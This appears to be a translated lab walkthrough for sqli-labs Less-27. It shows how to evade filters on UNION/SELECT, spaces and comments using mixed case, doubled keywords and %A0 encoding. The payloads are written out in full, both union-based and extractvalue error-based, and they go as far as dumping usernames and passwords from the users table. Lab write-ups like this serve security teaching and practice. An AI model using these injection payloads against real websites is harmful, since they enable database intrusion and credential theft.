#Bypass union and select bypass methods
1. Case bypass
?id=0'%A0u NI on%A0se LE c T %A01,2,3%A0and%A0'1'='1
2. Copy word bypass
?id=0'%A0uni union on%A0s select elect%A01,2,3%A0and%A0'1'='1
3. Error injection
#Demo case
1. Overwrite bypass
sqli-labs-master/Less-27
1. Determine the closing method and determine whether there is an injection point
?id=1'%A0and%A0'1'='1
First throw a parameter in
?id=1
The page is echoed normally
Throw a 'quote mark into it casually, and confirm the closing method
page echo
''1'' LIMIT 0,1'
'1'' LIMIT 0,1
The red part is from my input
Determine the closing method'single quotation marks
Enter the # sign to comment out the following content
The page still reports an error, not because there is something wrong with our input
Focus on the blue part, he filtered out the # we entered
Originally we entered ?id=1'#
When it reaches the database, it becomes ?id=1'
So report an error.
The above inference annotations are filtered
Use and '1'='1 for manual closing
Although the page echo is normal, we still focus on the blue part, the spaces we entered are filtered out
Originally ?id=1' and '1'='1
becomes ?id=1'and'1'='1
It is normal to use %A0 instead of spaces
Enter ?id=1'%A0and%A0'1'='2
The page reports an error, confirm that there is an injection point
2. Determine the number of fields in the database
/?id=1'%A0ununion%A0sselectelecT%A01,2,3%A0and%A0'1'='1
This level still uses order by to test the number of fields or use union to test.
url: ?id=1'%A0ununionion%A0sselectelecT%A01,2%A0and%A0'1'='1
report error
url:?id=1'%A0ununionion%A0sselectelecT%A01,2,3%A0and%A0'1'='1
When the test reaches 3, the page is normally echoed. Make sure the page has a total of 3 fields
3. Determine the fields displayed on the page
?id=0'%A0ununion%A0sselectelecT%A01,2,3%A0and%A0'1'='1
Because the source code also filters the - sign, so only 0 or a non-existing value can be used
Make sure the display field is 1, 2
4. Get the database name
?id=0'%A0ununionion%A0seselectlecT%A01,(database()),3%A0and%A0'1'='1
Make sure the current database name is security
5. Get all data tables
?id=0'%A0ununionion%A0sselecteleCt%A01,(sselectelecT%A0group_concat(table_name)
from%A0information_Schema.tables%A0where%A0
table_schema=database()),3%A0and%A0'1'='1
The datasheet is
emails,
referers,
uagents,
users
6. Get field (column) information
?id=0'%A0ununionion%A0sselecteleCt%A01,(sselectelecT%A0group_concat(column_name)
from%A0information_Schema.columns%A0where%A0
table_schema=database()%A0and%A0table_name='users'),3%A0and%A0'1'='1
field is
id,
username,
password
7. Drag library
?id=0'%A0uunionnion%A0sselectelecT%A01,(sselectelecT%A0group_concat(username,'~~',password)from%A0security.users),
3%A0and%A0'1'='1
2. Case bypass
1. Determine the closing method and determine whether there is an injection point
Enter a parameter page to echo normally
Throw a '' into the page and report an error
Determine the closing method'single quotation marks
Enter a comment character to comment the following code
From the page echo, the comment we entered is filtered
Use and '1'='1 for manual closing
From the blue part, the spaces we entered are also filtered
Use %A0 instead of spaces, the page is normal
Enter ?id=1'%A0and%A0'1'='2
The page reports an error to determine that there is an injection point
2. Determine the number of fields
?id=1'%A0UnION%A0SelecT%A01,2,3%A0and%A0'1'='1
url:?id=1'%A0UnIOn%A0SelecT%A01,2%A0and%A0'1'='1
When querying from field 1 to field 2, the page reports an error
When the query reaches 3, the page is normally echoed, and a total of 3 fields are confirmed
3. Determine the echo bit
id=0'%A0UnION%A0SelecT%A01,2,3%A0and%A0'1'='1
Make sure the fields of the echo page are 1, 2
4. Get the database
?id=0'%A0uNiOn%A0sELeCt%A01,(database()),3%A0and%A0'1'='1
Make sure the current database is Security
5. Get the data table
?id=0'%A0UnIoN%A0SelEcT%A01,(SeLect%A0group_concat(table_name)from%A0information_schema.tables%A0
where%A0table_schema=database()),3%A0and%A0'1'='1
emails,referers,uagents,users
6. Get column (field) information
?id=0'%A0UnIoN%A0SelEcT%A01,(SeLect%A0group_concat(column_name)from%A0information_schema.columns%A0
where%A0table_schema=database()%A0and%A0table_name='users'),3%A0and%A0'1'='1
id,
username,
password
7. Drag library
?id=0'%A0UnIon%A0SeLeCT%A01,(SeLeCt%A0group_concat(username,'~~',password)
from%A0security.users),3%A0and%A0'1'='1
3. Use error injection
1. Judging the closing method to determine whether there is an injection point
/?id=1'%A0and%A0'1'='2
Enter a parameter, and the page will be echoed normally
After the page is echoed, it is judged that the closing method is 'single quotation mark closing
Use comments to close to see if the page can be displayed normally
Judging from the page and the blue part, he ate the # comment we entered
Use single quotes for manual closure. The closure was successful, but he also filtered the spaces
Use %A0 instead of a space, and the blue part echoes successfully. And the page does not report an error
use and '1'='2
The page reports an error, and it is determined that there is an injection point.
And from the above, when we enter the 'single quotation mark, the page has a rough echo, and it is sure that the error injection can be used
In the above results, spaces are filtered and comments are filtered.
2. Get the database name
?id=1'%A0and%A0extractvalue(1,concat('~',(database())))%A0and%A0'1'='1
After the page echo, the database name is Security
3. Get the data table
?id=1'%A0and%A0extractvalue(1,concat(1,concat('~',(sElEcT%A0group_concat(table_name)from
%A0information_schema.tables%A0where%A0table_schema=database()))))
%A0and%A0'1'='1
4. Get (column) field information
?id=1'%A0and%A0extractvalue(1,concat(1,concat('~',(sElEcT%A0group_concat(column_name)from
%A0information_schema.columns%A0where%A0table_schema=database()%A0and%A0table_name='users'))))%A0and%A0'1'='1
~id,username,password'
5. Drag library
/?id=1'%A0and%A0extractvalue(1,concat('~',(substr((sElEct%A0group_concat(username,'!!',password)from%A0security.users),1,30))))%A0and%A0'1'='1
